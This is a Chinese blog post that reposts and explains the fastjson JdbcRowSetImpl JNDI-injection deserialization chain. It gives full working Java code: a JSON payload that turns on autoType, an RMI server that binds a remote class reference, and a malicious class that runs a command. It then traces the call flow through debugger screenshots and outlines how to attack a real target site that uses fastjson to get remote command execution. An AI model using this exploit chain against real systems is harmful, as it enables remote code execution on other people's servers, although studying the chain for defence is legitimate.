阅读 177

fastjson反序列化-JdbcRowSetImpl利用链

fastjson反序列化-JdbcRowSetImpl利用链

JdbcRowSetImpl利用链

fastjson反序列化JdbcRowSetImpl - Afant1 - 博客园 (cnblogs.com)

这里涉及了JNDI与RMI的概念。

其本质为JNDI注入。

附上示例代码

JdbcRowSetImplPoC.java


package org.lain.poc.poclist;



import com.alibaba.fastjson.JSONObject;

import com.alibaba.fastjson.parser.ParserConfig;



/**

 * @author: ZH3FENG

 * @Date: 下午7:53 2017/12/11

 * @Modified By:

 * @Description: Gadget com.sun.rowset.JdbcRowSetImpl

 *

 *               setAutoCommit() -> connect() -> InitialContext.lookup()

 */

public class JdbcRowSetImplPoC {





public static void testJdbcRowSetImpl(String dataSourceName){



ParserConfig config = new ParserConfig();



config.setAutoTypeSupport(true);//





String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","

+ "\"dataSourceName\":\"" + dataSourceName + "\","

+ "\"autoCommit\":\"true\"}";

System.out.println(payload);



try{

JSONObject.parse(payload,config);

}catch (Exception e){

e.printStackTrace();

}

}

}


RMIServer.java


package org.lain.poc.jndi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;



import javax.naming.Reference;

import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;



/**

 * @author: lanqihe

 * @Date: 下午8:01 2017/12/11

 * @Modified By:

 * @Description: 本地注册一个register,并将恶意的类绑定

 */

public class RMIServer {





public static void main(String argv[]) {



try {

Registry  registry =  LocateRegistry.createRegistry(1090);



//如果通过rmi无法找到org.lain.poc.jndi.EvilObjectFactory,则尝试从factoryLocation 获取

//因此,本地测试的话,如果factory正确,factoryLocation随便填

//把一个对象绑定到rmi注册表中,这个对象需要继承UnicastRemoteObject,但是Reference没有继承它,所以我们还需要封装一下它,用 ReferenceWrapper 包裹一下Reference实例对象,这样就可以将其绑定到rmi注册表,并被远程访问到了

Reference reference = new Reference("EvilObject",

"org.lain.poc.jndi.EvilObjectFactory",

"http://localhost:9999/" );





//客户端通过evil查找,获取到EvilObject

registry.bind("evil", new ReferenceWrapper(reference));



System.out.println("Ready!");

System.out.println("Waiting for connection......");



} catch (Exception e) {

System.out.println("RMIServer: " + e.getMessage());

e.printStackTrace();

}

}

}

EvilObject.java


package org.lain.poc.jndi;





import java.io.IOException;



/**

 * @author: ZH3FENG

 * @Date: 上午10:18 2017/12/12

 * @Modified By:

 * @Description: 模拟一个恶意类,静态代码块执行命令

 */

public class EvilObject {





public EvilObject(){

System.out.println("Hi!");

}

/**

     * 简单的命令执行

     */

static {

try {

Runtime.getRuntime().exec("calc");

}catch (IOException e){

//ignore

}

}

}

我们在JSONObject.parse方法下断点调试

image-20211020101611139

还是调用了parse.Object,步入

image-20211020102225142

image-20211020102758094

调用deserialze方法,进行反序列化

image-20211020103031361

接下来会对JdbcRowSetImpl进行 初始化

image-20211020103548234

在调用完构造函数后,parseObject还会去调用set方法。

根据poc的字段,可以在setDataSourceName与setAutoCommit下断点。

发现确实调用了这两个函数,在setDataSourceName方法中设置了数据源,setAutoCommit方法中,调用了connect方法。

image-20211020120948837

connect方法

image-20211020122318182

lookup方法

image-20211020122420085

decodeObject中就是解析reference,之后调用getOnjectInstance去实例化对象。

image-20211020131010703

调用流程总结:

image-20211020131258689

具体利用方法:

Fastjson反序列化漏洞利用 - 简书 (jianshu.com)

搭建一个rmi服务器和一个http服务器

将exp类部署到http服务器上。

如果目标网站存在fastjson包,且有json格式数据的输入点。则可以构造json数据,达到远程调用http服务器上的类,造成命令执行。

来源https://www.cnblogs.com/xyylll/p/15428700.html

文章分类
后端
文章标签
fastjson
jdbcrowsetimpl
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐